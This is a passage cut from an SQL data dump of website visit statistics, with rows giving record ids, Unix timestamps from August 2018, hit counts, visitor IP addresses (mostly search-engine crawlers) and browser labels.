8340,1,1,0,0,'54.36.148.222','other'),(286246,1533988428,1,1,0,0,'54.36.149.19','other'),(286247,1533988435,1,1,0,0,'54.36.148.70','other'),(286248,1533988673,1,1,0,0,'95.163.255.193','other'),(286249,1533989415,1,1,0,0,'54.36.148.240','other'),(286250,1533989530,1,1,0,0,'54.36.148.104','other'),(286251,1533989594,1,1,0,0,'54.36.148.205','other'),(286252,1533989748,1,1,0,0,'185.220.101.30','other'),(286253,1533990084,1,0,1,0,'66.249.66.61',''),(286254,1533990115,1,1,0,0,'54.36.148.126','other'),(286255,1533990369,1,1,0,0,'141.8.142.74','other'),(286256,1533990987,1,0,1,0,'66.249.66.59',''),(286257,1533991056,1,1,0,0,'54.36.148.202','other'),(286258,1533991130,1,1,0,0,'54.36.149.21','other'),(286259,1533991264,1,1,0,0,'54.36.148.58','other'),(286260,1533991472,1,1,0,0,'54.36.148.209','other'),(286261,1533991491,1,0,1,0,'66.249.66.157',''),(286262,1533991587,2,2,0,0,'66.249.66.157','chrome'),(286263,1533991590,1,1,0,0,'66.249.66.59','chrome'),(286264,1533991790,17,17,0,0,'5.9.77.102','other'),(286265,1533991996,1,1,0,0,'54.36.149.6','other'),(286266,1533992256,1,1,0,0,'91.196.178.103','chrome'),(286267,1533992291,1,1,0,0,'54.36.149.47','other'),(286268,1533992327,1,1,0,0,'54.36.148.110','other'),(286269,1533992365,1,1,0,0,'54.36.149.49','other'),(286270,1533992751,1,1,0,0,'13.66.185.4','other'),(286271,1533992793,1,1,0,0,'54.36.149.83','other'),(286272,1533992885,1,1,0,0,'162.210.196.97','other'),(286273,1533992978,1,1,0,0,'54.36.148.100','other'),(286274,1533993054,1,1,0,0,'87.250.224.46','other'),(286275,1533993327,1,1,0,0,'185.220.101.8','other'),(286276,1533994240,1,1,0,0,'8.29.198.27','other'),(286277,1533994360,1,1,0,0,'54.36.148.130','other'),(286278,1533994519,1,1,0,0,'54.36.148.201','other'),(286279,1533994856,1,1,0,0,'91.196.178.171','chrome'),(286280,1533995546,1,1,0,0,'54.36.148.153','other'),(286281,1533995872,1,1,0,0,'64.246.165.150','firefox'),(286282,1533996004,1,1,0,0,'54.36.148.180','other'),(286283,1533996058,1,1,0,0,'54.36.149.39','other'),(286284,1533996116,1,1,0,0,'54.36.149.88','other'),(286285,1533996353,1,1,0,0,'8.29.198.27','other'),(286286,1533996549,1,1,0,0,'54.36.148.135','other'),(286287,1533996622,1,1,0,0,'54.36.148.172','other'),(286288,1533996651,1,1,0,0,'54.36.149.92','other'),(286289,1533996764,1,1,0,0,'87.250.224.46','other'),(286290,1533996775,1,1,0,0,'54.36.149.5','other'),(286291,1533996927,1,1,0,0,'62.141.37.236','other'),(286292,1533997367,1,1,0,0,'54.36.149.35','other'),(286293,1533997410,1,1,0,0,'54.36.149.80','other'),(286294,1533997648,1,1,0,0,'141.8.142.74','other'),(286295,1533998163,1,1,0,0,'54.36.148.37','other'),(286296,1533998583,1,1,0,0,'54.36.149.23','other'),(286297,1533998645,1,1,0,0,'54.36.148.81','other'),(286298,1533998718,1,0,1,0,'66.249.66.156',''),(286299,1533998759,1,1,0,0,'54.36.149.77','other'),(286300,1533998934,1,1,0,0,'54.36.148.102','other'),(286301,1533998969,1,0,1,0,'66.249.66.155',''),(286302,1533999246,1,1,0,0,'54.36.149.80','other'),(286303,1533999610,1,1,0,0,'54.36.149.33','other'),(286304,1533999845,2,2,0,0,'178.154.171.88','other'),(286305,1533999877,1,1,0,0,'54.36.148.116','other'),(286306,1533999901,1,0,1,0,'66.249.66.61',''),(286307,1534000214,1,1,0,0,'66.249.66.57','chrome'),(286308,1534000218,1,1,0,0,'66.249.66.155','chrome'),(286309,1534000345,1,1,0,0,'54.36.148.216','other'),(286310,1534000378,1,1,0,0,'141.8.142.74','other'),(286311,1534000392,1,1,0,0,'54.36.148.206','other'),(286312,1534000427,1,1,0,0,'54.36.148.66','other'),(286313,1534000526,1,1,0,0,'216.244.66.241','other'),(286314,1534000528,1,1,0,0,'51.15.15.79','other'),(286315,1534000686,1,1,0,0,'54.36.149.11','other'),(286316,1534000825,1,1,0,0,'54.36.149.4','other'),(286317,1534000961,1,1,0,0,'54.36.148.197','other'),(286318,1534000994,1,1,0,0,'91.201.247.35','chrome'),(286319,1534001022,1,1,0,0,'54.36.148.180','other'),(286320,1534001268,1,0,1,0,'66.249.66.61',''),(286321,1534001367,1,1,0,0,'54.36.149.61','other'),(286322,1534001544,1,1,0,0,'54.36.149.37','other'),(286323,1534001593,1,1,0,0,'54.36.149.55','other'),(286324,1534001988,1,1,0,0,'54.36.149.85','other'),(286325,1534002455,1,1,0,0,'54.36.148.72','other'),(286326,1534002482,1,1,0,0,'54.36.148.152','other'),(286327,1534002483,1,1,0,0,'216.244.66.241','other'),(286328,1534002617,1,1,0,0,'54.36.148.213','other'),(286329,1534002854,2,0,2,0,'66.249.66.57',''),(286330,1534002929,1,0,1,0,'66.249.66.61',''),(286331,1534002940,1,0,1,0,'66.249.66.59',''),(286332,1534003018,1,1,0,0,'54.36.148.247','other'),(286333,1534003039,1,0,1,0,'66.249.66.156',''),(286334,1534003068,1,1,0,0,'54.36.148.107','other'),(286335,1534003379,1,1,0,0,'54.36.149.50','other'),(286336,1534003449,1,1,0,0,'54.36.148.176','other'),(286337,1534003524,1,1,0,0,'54.36.148.221','other'),(286338,1534003547,1,1,0,0,'216.244.66.241','other'),(286339,1534003669,1,1,0,0,'157.55.39.9','other'),(286340,1534004052,1,1,0,0,'54.36.149.43','other'),(286341,1534004148,1,1,0,0,'95.168.216.16','other'),(286342,1534004728,1,1,0,0,'54.36.148.82','other'),(286343,1534004734,1,1,0,0,'54.36.148.85','other'),(286344,1534005078,1,1,0,0,'8.29.198.25','other'),(286345,1534005161,1,1,0,0,'13.66.185.4','other'),(286346,1534005228,2,2,0,0,'91.196.178.88','chrome'),(286347,1534005338,1,1,0,0,'54.36.149.106','other'),(286348,1534005418,1,1,0,0,'54.36.148.130','other'),(286349,1534005530,1,1,0,0,'54.36.148.241','other'),(286350,1534005632,1,1,0,0,'141.8.142.74','other'),(286351,1534005650,1,1,0,0,'216.244.66.241','other'),(286352,1534005812,1,1,0,0,'54.36.148.131','other'),(286353,1534005855,1,1,0,0,'54.36.148.126','other'),(286354,1534005868,1,1,0,0,'54.36.148.200','other'),(286355,1534005869,1,1,0,0,'95.163.255.197','other'),(286356,1534005982,1,1,0,0,'54.36.149.8','other'),(286357,1534006124,1,1,0,0,'54.36.149.9','other'),(286358,1534006723,1,1,0,0,'54.36.149.34','other'),(286359,1534007059,1,1,0,0,'54.36.149.60','other'),(286360,1534007187,1,1,0,0,'8.29.198.26','other'),(286361,1534007198,1,1,0,0,'54.36.148.58','other'),(286362,1534007399,1,1,0,0,'141.8.142.74','other'),(286363,1534007490,1,0,1,0,'66.249.66.61',''),(286364,1534007511,2,0,2,0,'66.249.66.157',''),(286365,1534007622,1,1,0,0,'54.36.149.75','other'),(286366,1534007655,1,1,0,0,'54.36.148.239','other'),(286367,1534007715,1,1,0,0,'54.36.148.185','other'),(286368,1534007744,1,1,0,0,'185.220.101.34','other'),(286369,1534007844,1,1,0,0,'54.36.148.11','other'),(286370,1534007850,1,0,1,0,'66.249.66.57',''),(286371,1534007880,1,1,0,0,'66.249.66.57','chrome'),(286372,1534007883,1,1,0,0,'66.249.66.156','chrome'),(286373,1534007959,1,1,0,0,'54.36.148.12','other'),(286374,1534008291,1,1,0,0,'54.36.148.18','other'),(286375,1534008326,1,1,0,0,'141.8.142.74','other'),(286376,1534008470,1,1,0,0,'54.36.148.248','other'),(286377,1534008502,1,1,0,0,'54.36.148.33','other'),(286378,1534009137,1,0,1,0,'66.249.66.156',''),(286379,1534009165,1,1,0,0,'54.36.148.98','other'),(286380,1534009417,1,1,0,0,'207.46.13.87','other'),(286381,1534009908,1,1,0,0,'54.36.148.184','other'),(286382,1534010130,1,1,0,0,'54.36.149.48','other'),(286383,1534010189,1,1,0,0,'141.8.142.74','other'),(286384,1534010401,1,1,0,0,'66.249.66.156','chrome'),(286385,1534010655,1,1,0,0,'54.36.148.65','other'),(286386,1534010767,1,0,1,0,'66.249.66.61',''),(286387,1534010876,1,1,0,0,'188.32.172.181','msie'),(286388,1534010891,1,1,0,0,'92.113.189.235','chrome'),(286389,1534011343,1,1,0,0,'46.36.35.96','other'),(286390,1534011473,1,1,0,0,'178.154.171.88','other'),(286391,1534011776,1,1,0,0,'54.36.148.87','other'),(286392,1534012114,1,1,0,0,'54.36.149.15','other'),(286393,1534012172,2,2,0,0,'178.92.73.164','firefox'),(286394,1534012415,1,1,0,0,'54.36.149.31','other'),(286395,1534012668,1,1,0,0,'54.36.149.0','other'),(286396,1534012788,1,1,0,0,'54.36.148.126','other'),(286397,1534012915,3,3,0,0,'141.8.142.74','other'),(286398,1534013167,1,1,0,0,'54.36.148.199','other'),(286399,1534013390,1,1,0,0,'54.36.148.51','other'),(286400,1534013512,1,1,0,0,'54.36.148.96','other'),(286401,1534013794,1,1,0,0,'216.244.66.241','other'),(286402,1534014460,1,1,0,0,'54.36.148.228','other'),(286403,1534014734,1,1,0,0,'54.36.148.196','other'),(286404,1534014955,1,1,0,0,'185.220.101.28','other'),(286405,1534015330,1,1,0,0,'54.36.149.43','other'),(286406,1534015591,1,1,0,0,'141.8.142.74','other'),(286407,1534015651,1,0,1,0,'66.249.66.156',''),(286408,1534015727,1,1,0,0,'54.36.148.48','other'),(286409,1534015853,1,1,0,0,'54.36.148.39','other'),(286410,1534015916,1,1,0,0,'8.29.198.26','other'),(286411,1534016348,1,1,0,0,'54.36.148.129','other'),(286412,1534016446,1,0,1,0,'66.249.66.157',''),(286413,1534016536,1,1,0,0,'54.36.148.218','other'),(286414,1534016769,1,1,0,0,'207.46.13.87','other'),(286415,1534016841,1,1,0,0,'54.36.148.130','other'),(286416,1534017047,1,1,0,0,'157.55.39.9','other'),(286417,1534017091,1,0,1,0,'66.249.66.57',''),(286418,1534017134,1,1,0,0,'66.249.66.61','chrome'),(286419,1534017138,1,1,0,0,'66.249.66.156','chrome'),(286420,1534017253,1,1,0,0,'54.36.148.19','other'),(286421,1534017569,2,2,0,0,'141.8.142.74','other'),(286422,1534017641,1,1,0,0,'91.196.178.88','chrome'),(286423,1534018003,1,1,0,0,'54.36.149.56','other'),(286424,1534018015,1,1,0,0,'8.29.198.25','other'),(286425,1534018064,1,0,1,0,'66.249.66.157',''),(286426,1534018534,1,1,0,0,'54.36.149.74','other'),(286427,1534018563,1,1,0,0,'54.36.148.174','other'),(286428,1534018865,1,1,0,0,'54.36.149.28','other'),(286429,1534019194,1,1,0,0,'54.36.148.122','other'),(286430,1534019198,1,1,0,0,'87.250.224.46','other'),(286431,1534019256,1,1,0,0,'54.36.149.90','other'),(286432,1534019730,1,1,0,0,'91.196.178.45','other'),(286433,1534019875,1,1,0,0,'54.36.149.60','other'),(286434,1534020145,1,1,0,0,'178.154.171.88','other'),(286435,1534020610,1,1,0,0,'54.36.148.167','other'),(286436,1534020611,1,1,0,0,'54.36.148.173','other'),(286437,1534020923,1,1,0,0,'54.36.148.109','other'),(286438,1534021123,1,1,0,0,'54.36.148.28','other'),(286439,1534021232,1,1,0,0,'54.36.149.69','other'),(286440,1534021908,1,0,1,0,'66.249.66.156',''),(286441,1534021917,1,1,0,0,'54.36.148.52','other'),(286442,1534022062,1,1,0,0,'54.36.148.186','other'),(286443,1534022076,1,1,0,0,'54.36.148.115','other'),(286444,1534022150,1,1,0,0,'154.16.3.119','other'),(286445,1534022557,1,1,0,0,'54.36.148.91','other'),(286446,1534022652,1,1,0,0,'54.36.148.254','other'),(286447,1534023104,1,1,0,0,'207.46.13.233','other'),(286448,1534023115,4,4,0,0,'144.76.29.66','other'),(286449,1534023303,2,2,0,0,'37.9.113.182','other'),(286450,1534023822,1,1,0,0,'178.154.200.73','other'),(286451,1534024353,1,1,0,0,'54.36.149.66','other'),(286452,1534024357,1,1,0,0,'54.36.148.100','other'),(286453,1534024668,1,1,0,0,'54.36.148.151','other'),(286454,1534024677,1,1,0,0,'216.244.66.241','other'),(286455,1534024994,1,0,1,0,'66.249.66.156',''),(286456,1534025027,1,1,0,0,'157.55.39.9','other'),(286457,1534025161,1,1,0,0,'54.36.149.10','other'),(286458,1534025194,1,1,0,0,'54.36.148.181','other'),(286459,1534025341,1,1,0,0,'66.249.66.57','chrome'),(286460,1534025416,1,1,0,0,'54.36.148.15','other'),(286461,1534025483,1,1,0,0,'54.36.148.35','other'),(286462,1534025561,1,1,0,0,'54.36.148.238','other'),(286463,1534025581,1,1,0,0,'54.36.148.255','other'),(286464,1534025589,1,1,0,0,'54.36.149.19','other'),(286465,1534025756,1,1,0,0,'185.220.101.0','other'),(286466,1534026035,1,1,0,0,'54.36.149.66','other'),(286467,1534026349,5,5,0,0,'157.55.39.90','other'),(286468,1534026362,1,1,0,0,'54.36.149.99','other'),(286469,1534026426,1,1,0,0,'54.36.149.39','other'),(286470,1534026433,4,4,0,0,'141.8.142.74','other'),(286471,1534026745,1,1,0,0,'8.29.198.26','other'),(286472,1534026911,3,3,0,0,'207.46.13.87','other'),(286473,1534026915,1,1,0,0,'216.244.66.241','other'),(286474,1534026921,6,6,0,0,'207.46.13.233','other'),(286475,1534026932,4,4,0,0,'157.55.39.9','other'),(286476,1534027085,1,1,0,0,'54.36.148.122','other'),(286477,1534027409,1,1,0,0,'54.36.148.208','other'),(286478,1534027964,2,2,0,0,'178.154.171.88','other'),(286479,1534028165,1,1,0,0,'54.36.149.68','other'),(286480,1534028842,1,1,0,0,'8.29.198.25','other'),(286481,1534029059,1,1,0,0,'54.36.148.219','other'),(286482,1534029341,1,1,0,0,'178.17.166.149','other'),(286483,1534030198,1,1,0,0,'54.36.148.237','other'),(286484,1534030200,1,1,0,0,'54.36.149.44','other'),(286485,1534030493,1,1,0,0,'54.36.149.66','other'),(286486,1534030498,15,15,0,0,'195.201.126.33','other'),(286487,1534030502,1,1,0,0,'54.36.149.39','other'),(286488,1534030722,1,1,0,0,'207.46.13.233','other'),(286489,1534031080,1,1,0,0,'54.36.148.185','other'),(286490,1534031168,9,9,0,0,'5.9.156.30','other'),(286491,1534031207,1,1,0,0,'54.36.148.177','other'),(286492,1534031283,1,1,0,0,'54.36.148.67','other'),(286493,1534031312,1,1,0,0,'54.36.148.135','other'),(286494,1534031517,1,1,0,0,'54.36.149.9','other'),(286495,1534032236,1,1,0,0,'54.36.148.106','other'),(286496,1534032417,1,1,0,0,'54.36.148.228','other'),(286497,1534032720,2,2,0,0,'141.8.142.74','other'),(286498,1534032783,1,1,0,0,'54.36.148.52','other'),(286499,1534032942,1,1,0,0,'51.15.252.116','other'),(286500,1534033537,1,1,0,0,'178.154.171.88','other'),(286501,1534034163,1,1,0,0,'54.36.148.37','other'),(286502,1534034460,1,1,0,0,'54.36.148.159','other'),(286503,1534034704,1,1,0,0,'54.36.149.29','other'),(286504,1534034855,1,1,0,0,'54.36.148.158','other'),(286505,1534034910,1,1,0,0,'54.36.149.89','other'),(286506,1534035008,1,1,0,0,'54.36.148.154','other'),(286507,1534035221,1,1,0,0,'54.36.148.157','other'),(286508,1534035388,1,1,0,0,'54.36.148.94','other'),(286509,1534035405,1,1,0,0,'54.36.149.81','other'),(286510,1534035517,1,1,0,0,'178.154.171.10','other'),(286511,1534036133,1,1,0,0,'91.209.11.236','other'),(286512,1534036168,1,1,0,0,'54.36.149.58','other'),(286513,1534036527,1,1,0,0,'185.220.101.33','other'),(286514,1534036536,1,1,0,0,'141.8.132.19','other'),(286515,1534036631,1,1,0,0,'178.154.171.88','other'),(286516,1534036738,1,1,0,0,'54.36.149.101','other'),(286517,1534037309,1,1,0,0,'54.36.149.33','other'),(286518,1534037511,1,1,0,0,'54.36.149.44','other'),(286519,1534037577,1,1,0,0,'8.29.198.26','other'),(286520,1534038086,1,1,0,0,'54.36.148.154','other'),(286521,1534038317,1,1,0,0,'54.36.149.41','other'),(286522,1534038452,1,0,1,0,'66.249.66.61',''),(286523,1534038907,1,1,0,0,'54.36.148.47','other'),(286524,1534038912,1,1,0,0,'207.46.13.233','other'),(286525,1534039073,1,1,0,0,'54.36.148.114','other'),(286526,1534039149,1,1,0,0,'54.36.148.248','other'),(286527,1534039243,1,1,0,0,'54.36.149.25','other'),(286528,1534039422,1,0,1,0,'66.249.66.57',''),(286529,1534039523,1,1,0,0,'54.36.149.84','other'),(286530,1534039676,1,1,0,0,'8.29.198.25','other'),(286531,1534039751,1,1,0,0,'216.244.66.241','other'),(286532,1534039974,1,1,0,0,'141.8.142.74','other'),(286533,1534040149,1,1,0,0,'51.255.202.66','other'),(286534,1534040457,1,1,0,0,'207.46.13.233','other'),(286535,1534040660,1,1,0,0,'54.36.148.231','other'),(286536,1534040861,1,1,0,0,'52.41.211.72','chrome'),(286537,1534040879,1,0,1,0,'66.249.66.57',''),(286538,1534040916,1,1,0,0,'54.36.148.41','other'),(286539,1534041051,1,1,0,0,'94.130.9.183','other'),(286540,1534041345,1,1,0,0,'54.36.149.71','other'),(286541,1534041478,1,1,0,0,'54.36.148.80','other'),(286542,1534041832,1,1,0,0,'54.36.148.229','other'),(286543,1534041991,1,1,0,0,'54.36.148.99','other'),(286544,1534042715,1,1,0,0,'54.36.149.93','other'),(286545,1534042982,1,1,0,0,'54.36.148.113','other'),(286546,1534042991,1,1,0,0,'54.36.148.10','other'),(286547,1534043060,1,1,0,0,'54.36.148.27','other'),(286548,1534043530,1,1,0,0,'141.8.142.74','other'),(286549,1534043560,1,1,0,0,'54.36.148.107','other'),(286550,1534043719,1,1,0,0,'54.36.148.87','other'),(286551,1534043881,1,1,0,0,'54.36.148.29','other'),(286552,1534044481,1,1,0,0,'54.36.148.150','other'),(286553,1534044976,1,1,0,0,'54.36.149.87','other'),(286554,1534045141,1,1,0,0,'54.36.148.153','other'),(286555,1534045188,1,1,0,0,'54.36.148.243','other'),(286556,1534045214,1,1,0,0,'54.36.148.219','other'),(286557,1534045294,1,1,0,0,'54.36.149.102','other'),(286558,1534045329,1,1,0,0,'54.36.148.160','other'),(286559,1534046030,1,1,0,0,'54.36.149.98','other'),(286560,1534046246,1,1,0,0,'54.36.148.250','other'),(286561,1534046254,1,1,0,0,'54.36.149.27','other'),(286562,1534046834,71,71,0,0,'94.154.239.69','other'),(286563,1534046916,1,1,0,0,'54.36.148.180','other'),(286564,1534047169,1,1,0,0,'157.55.39.90','other'),(286565,1534047914,1,1,0,0,'87.250.224.46','other'),(286566,1534047938,1,1,0,0,'141.8.142.74','other'),(286567,1534048051,1,1,0,0,'37.9.113.110','other'),(286568,1534048404,1,1,0,0,'8.29.198.27','other'),(286569,1534049008,1,1,0,0,'54.36.148.220','other'),(286570,1534049165,21,21,0,0,'85.10.199.185','other'),(286571,1534049206,1,1,0,0,'216.244.66.241','other'),(286572,1534049789,1,1,0,0,'54.36.149.44','other'),(286573,1534050308,1,1,0,0,'54.36.148.33','other'),(286574,1534050399,1,1,0,0,'54.36.148.156','other'),(286575,1534050515,1,1,0,0,'8.29.198.27','other'),(286576,1534050548,1,1,0,0,'54.36.148.93','other'),(286577,1534050851,7,7,0,0,'94.130.9.183','other'),(286578,1534050926,1,1,0,0,'95.130.9.210','other'),(286579,1534051003,1,1,0,0,'54.36.149.48','other'),(286580,1534051201,1,1,0,0,'54.36.149.60','other'),(286581,1534051333,1,1,0,0,'54.36.148.62','other'),(286582,1534051641,1,1,0,0,'54.36.148.118','other'),(286583,1534051757,7,7,0,0,'94.130.9.183','other'),(286584,1534052161,1,1,0,0,'95.163.255.94','other'),(286585,1534052190,1,1,0,0,'54.36.149.4','other'),(286586,1534052384,1,1,0,0,'178.154.200.45','other'),(286587,1534052403,1,1,0,0,'54.36.148.219','other'),(286588,1534052458,1,1,0,0,'54.36.148.255','other'),(286589,1534052669,8,8,0,0,'94.130.9.183','other'),(286590,1534053104,1,1,0,0,'54.36.149.79','other'),(286591,1534053559,1,1,0,0,'54.36.148.187','other'),(286592,1534053569,1,1,0,0,'54.36.149.41','other'),(286593,1534053570,8,8,0,0,'94.130.9.183','other'),(286594,1534053781,1,1,0,0,'54.36.149.6','other'),(286595,1534053885,1,1,0,0,'54.36.148.225','other'),(286596,1534054243,1,1,0,0,'54.36.148.62','other'),(286597,1534054319,1,1,0,0,'54.36.148.169','other'),(286598,1534054469,1,1,0,0,'54.36.148.88','other'),(286599,1534054470,1,1,0,0,'5.45.207.82','other'),(286600,1534054489,7,7,0,0,'94.130.9.183','other'),(286601,1534054527,1,1,0,0,'46.166.139.35','other'),(286602,1534054614,1,1,0,0,'54.36.148.28','other'),(286603,1534054634,1,1,0,0,'54.36.149.107','other'),(286604,1534055026,1,1,0,0,'178.92.144.90','chrome'),(286605,1534055085,12,12,0,0,'144.76.137.254','other'),(286606,1534055203,1,1,0,0,'54.36.148.157','other'),(286607,1534055226,1,1,0,0,'37.9.113.101','other'),(286608,1534055391,8,8,0,0,'94.130.9.183','other'),(286609,1534055478,1,1,0,0,'54.36.149.59','other'),(286610,1534056143,1,1,0,0,'178.154.171.88','other'),(286611,1534056316,7,7,0,0,'94.130.9.183','other'),(286612,1534056680,2,2,0,0,'141.8.142.74','other'),(286613,1534056824,1,1,0,0,'46.211.1.102','other'),(286614,1534057190,1,1,0,0,'54.36.148.187','other'),(286615,1534057256,7,7,0,0,'94.130.9.183','other'),(286616,1534057277,1,1,0,0,'54.36.149.63','other'),(286617,1534057282,1,1,0,0,'54.36.148.249','other'),(286618,1534057825,1,1,0,0,'54.36.148.48','other'),(286619,1534057927,1,1,0,0,'54.36.148.228','other'),(286620,1534057941,1,1,0,0,'141.8.142.74','other'),(286621,1534058254,1,1,0,0,'54.36.149.39','other'),(286622,1534058280,4,4,0,0,'94.130.9.183','other'),(286623,1534058339,1,1,0,0,'54.36.149.62','other'),(286624,1534058616,1,1,0,0,'54.36.148.132','other'),(286625,1534059041,1,1,0,0,'54.36.149.91','other'),(286626,1534059206,6,6,0,0,'94.130.9.183','other'),(286627,1534059235,1,1,0,0,'8.29.198.27','other'),(286628,1534059330,1,1,0,0,'95.163.255.97','other'),(286629,1534059342,1,1,0,0,'95.163.255.106','other'),(286630,1534059446,1,1,0,0,'54.36.148.100','other'),(286631,1534059533,1,1,0,0,'54.36.148.157','other'),(286632,1534059638,1,1,0,0,'141.8.142.74','other'),(286633,1534059923,1,1,0,0,'54.36.148.99','other'),(286634,1534059986,1,1,0,0,'54.36.148.125','other'),(286635,1534060742,1,1,0,0,'54.36.148.25','other'),(286636,1534060905,1,1,0,0,'207.46.13.233','other'),(286637,1534061117,1,1,0,0,'54.36.149.50','other'),(286638,1534061365,1,1,0,0,'8.29.198.25','other'),(286640,1534061497,1,1,0,0,'54.36.148.28','other'),(286641,1534061625,1,1,0,0,'54.36.148.53','other'),(286642,1534061706,1,1,0,0,'54.36.148.134','other'),(286643,1534061755,1,1,0,0,'51.15.252.116','other'),(286644,1534061804,1,1,0,0,'40.77.167.70','other'),(286645,1534061920,1,1,0,0,'176.96.194.130','chrome'),(286646,1534062007,1,1,0,0,'82.145.221.176','other'),(286647,1534062150,2,2,0,0,'54.165.59.7','other'),(286648,1534062455,1,1,0,0,'54.36.148.124','other'),(286649,1534062676,1,1,0,0,'54.36.149.62','other'),(286650,1534062726,1,1,0,0,'54.36.148.152','other'),(286651,1534062858,1,1,0,0,'54.36.148.219','other'),(286652,1534062935,1,1,0,0,'54.36.149.2','other'),(286653,1534063107,1,1,0,0,'54.36.149.50','other'),(286654,1534063252,1,1,0,0,'54.165.59.7','other'),(286655,1534064284,1,1,0,0,'91.196.178.135','firefox'),(286656,1534064452,1,1,0,0,'54.36.148.140','other'),(286657,1534064501,1,1,0,0,'54.36.148.189','other'),(286658,1534064748,1,1,0,0,'46.133.106.120','other'),(286659,1534064987,1,1,0,0,'54.165.59.7','other'),(286660,1534065216,1,1,0,0,'54.36.148.143','other'),(286661,1534065305,1,1,0,0,'157.55.39.90','other'),(286662,1534065332,1,1,0,0,'185.220.101.46','other'),(286663,1534065334,1,1,0,0,'108.59.8.70','other'),(286664,1534065617,1,1,0,0,'207.46.13.233','other'),(286665,1534065992,1,1,0,0,'87.250.224.46','other'),(286666,1534066059,1,1,0,0,'54.36.149.14','other'),(286667,1534066232,1,1,0,0,'37.9.113.182','other'),(286668,1534066718,1,1,0,0,'54.36.148.119','other'),(286669,1534066727,1,1,0,0,'54.36.148.49','other'),(286670,1534066862,2,2,0,0,'141.8.142.74','other'),(286671,1534066912,2,2,0,0,'54.36.149.85','other'),(286672,1534067184,1,1,0,0,'54.36.149.106','other'),(286673,1534067205,1,1,0,0,'78.111.190.111','chrome'),(286674,1534067369,1,1,0,0,'54.36.149.76','other'),(286675,1534067633,1,1,0,0,'54.36.148.170','other'),(286676,1534067959,2,2,0,0,'141.8.142.74','other'),(286677,1534067963,1,1,0,0,'54.36.149.95','other'),(286678,1534068178,2,2,0,0,'178.154.171.88','other'),(286679,1534068215,1,1,0,0,'37.54.114.62','chrome'),(286680,1534068617,1,1,0,0,'54.36.148.255','other'),(286681,1534068729,1,1,0,0,'54.36.149.100','other'),(286682,1534068873,1,1,0,0,'54.36.148.126','other'),(286683,1534068929,1,1,0,0,'185.220.101.12','other'),(286684,1534068930,1,1,0,0,'54.36.148.142','other'),(286685,1534069001,1,1,0,0,'54.36.149.57','other'),(286686,1534069086,1,1,0,0,'216.244.66.241','other'),(286687,1534069104,1,1,0,0,'54.36.148.125','other'),(286688,1534069106,1,1,0,0,'54.165.59.7','other'),(286689,1534069728,1,1,0,0,'54.36.148.139','other'),(286690,1534070067,1,1,0,0,'8.29.198.25','other'),(286691,1534070175,1,1,0,0,'54.36.148.149','other'),(286692,1534070492,1,1,0,0,'178.154.171.88','other'),(286693,1534071303,2,2,0,0,'141.8.142.74','other'),(286694,1534071374,1,1,0,0,'54.36.149.94','other'),(286695,1534072199,1,1,0,0,'8.29.198.27','other'),(286696,1534072316,1,1,0,0,'54.36.148.194','other'),(286697,1534072373,2,2,0,0,'5.9.156.121','other'),(286698,1534072420,1,1,0,0,'95.133.194.181','chrome'),(286699,1534072539,1,1,0,0,'94.102.51.78','other'),(286700,1534072738,1,1,0,0,'91.209.11.236','other'),(286701,1534072932,1,0,1,0,'66.249.66.157',''),(286702,1534073137,1,1,0,0,'54.36.148.45','other'),(286703,1534073843,1,1,0,0,'54.36.148.254','other'),(286704,1534074099,1,1,0,0,'216.244.66.241','other'),(286705,1534074137,1,0,1,0,'66.249.66.57',''),(286706,1534074211,1,1,0,0,'54.36.148.178','other'),(286707,1534074479,1,1,0,0,'54.36.148.64','other'),(286708,1534074776,1,1,0,0,'54.36.148.164','other'),(286709,1534074830,10,10,0,0,'188.165.214.26','other'),(286710,1534074988,1,0,1,0,'66.249.66.157',''),(286711,1534075055,1,0,1,0,'66.249.66.155',''),(286712,1534075103,1,1,0,0,'54.36.148.198','other'),(286713,1534075838,1,0,1,0,'66.249.66.59',''),(286714,1534076038,12,12,0,0,'207.46.13.87','other'),(286715,1534076050,25,25,0,0,'207.46.13.233','other'),(286716,1534076083,14,14,0,0,'157.55.39.90','other'),(286717,1534076149,1,1,0,0,'185.220.102.6','other'),(286718,1534076315,1,1,0,0,'92.113.189.235','chrome'),(286719,1534076416,1,1,0,0,'178.140.85.196','chrome'),(286720,1534076483,1,1,0,0,'54.36.148.227','other'),(286721,1534076533,1,1,0,0,'54.36.149.88','other'),(286722,1534076665,1,1,0,0,'54.36.148.198','other'),(286723,1534076900,1,1,0,0,'54.36.149.97','other'),(286724,1534076921,1,1,0,0,'54.36.149.3','other'),(286725,1534077101,1,1,0,0,'54.36.149.70','other'),(286726,1534077206,1,1,0,0,'54.36.148.75','other'),(286727,1534077322,1,1,0,0,'54.36.148.111','other'),(286728,1534077382,1,1,0,0,'54.36.148.106','other'),(286729,1534077588,1,1,0,0,'54.36.148.116','other'),(286730,1534077610,1,1,0,0,'54.36.149.79','other'),(286731,1534077780,1,1,0,0,'54.36.148.179','other'),(286732,1534077961,1,1,0,0,'54.36.149.86','other'),(286733,1534078503,1,1,0,0,'54.36.148.212','other'),(286734,1534078562,1,0,1,0,'66.249.66.157',''),(286735,1534078596,1,1,0,0,'54.36.149.100','other'),(286736,1534078648,1,1,0,0,'92.113.189.235','chrome'),(286737,1534078912,1,1,0,0,'95.163.255.176','other'),(286738,1534079035,1,1,0,0,'54.36.149.102','other'),(286739,1534079192,1,0,1,0,'66.249.66.155',''),(286740,1534079254,1,1,0,0,'54.165.59.7','other'),(286741,1534079730,1,1,0,0,'54.36.149.68','other'),(286742,1534079747,1,1,0,0,'137.74.169.241','other'),(286743,1534079911,2,2,0,0,'141.8.142.74','other'),(286744,1534080077,7,7,0,0,'195.201.24.218','other'),(286745,1534080357,1,1,0,0,'54.36.148.121','other'),(286746,1534080374,1,1,0,0,'54.36.148.40','other'),(286747,1534080762,1,1,0,0,'54.36.149.68','other'),(286748,1534080807,1,1,0,0,'54.36.149.27','other'),(286749,1534080903,1,1,0,0,'8.29.198.27','other'),(286750,1534080995,1,1,0,0,'207.46.13.233','other'),(286751,1534081300,1,1,0,0,'54.36.148.63','other'),(286752,1534081371,1,1,0,0,'54.36.149.104','other'),(286753,1534081425,1,1,0,0,'54.36.149.42','other'),(286754,1534082067,1,0,1,0,'66.249.66.59',''),(286755,1534082170,1,1,0,0,'54.36.149.18','other'),(286756,1534082300,1,1,0,0,'207.46.13.233','other'),(286757,1534082536,1,1,0,0,'54.36.148.184','other'),(286758,1534082760,1,1,0,0,'54.36.148.223','other'),(286759,1534082769,2,2,0,0,'54.36.148.214','other'),(286760,1534082905,1,1,0,0,'87.250.224.46','other'),(286761,1534082942,1,1,0,0,'54.36.148.201','other'),(286762,1534083039,1,1,0,0,'